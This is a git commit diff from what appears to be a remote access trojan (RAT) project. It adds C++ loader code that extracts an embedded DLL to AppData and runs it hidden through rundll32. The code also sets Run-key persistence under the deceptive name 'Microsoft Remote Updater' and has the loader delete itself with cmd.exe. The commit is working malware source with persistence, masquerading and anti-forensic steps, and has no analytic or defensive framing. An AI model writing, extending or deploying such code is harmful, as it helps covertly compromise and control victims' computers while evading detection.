DLL now has persistance, Loader deletes itself after extracting dll and creating persistance

This commit is contained in:
hellisabove
2023-07-03 20:15:14 +03:00
parent 9f4a57720b
commit e99cfca22a
22 changed files with 64 additions and 7 deletions
+4
View File
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -96,7 +96,7 @@
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
<AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+49 -1
View File
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name
// extract payload from section
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
CloseHandle(new_file);
}
LocalFree(dll_memory);
// runs the dll after extraction
WCHAR win_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
lstrcatW(win_path, appdata_path);
lstrcatW(win_path, L",");
lstrcatW(win_path, L"FunEntry");
STARTUPINFO startup_inf{ 0 };
PROCESS_INFORMATION process_information{ 0 };
startup_inf.cb = sizeof(startup_inf);
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
if (b) {
HKEY reg_key;
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &reg_key);
if (bb == ERROR_SUCCESS) {
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
RegCloseKey(reg_key);
}
//WaitForSingleObject(process_information.hProcess, INFINITE);
//CloseHandle(process_information.hProcess);
}
}
}
}
// delete loader
WCHAR del_cmd[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
WCHAR app_name[MAX_PATH];
GetModuleFileNameW(0, app_name, MAX_PATH);
lstrcatW(del_cmd, L"/c del \"");
lstrcatW(del_cmd, app_name);
lstrcatW(del_cmd, L"\"");
STARTUPINFO sii{ 0 };
PROCESS_INFORMATION pii{ 0 };
sii.cb = sizeof(sii);
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
return 0;
}
}
}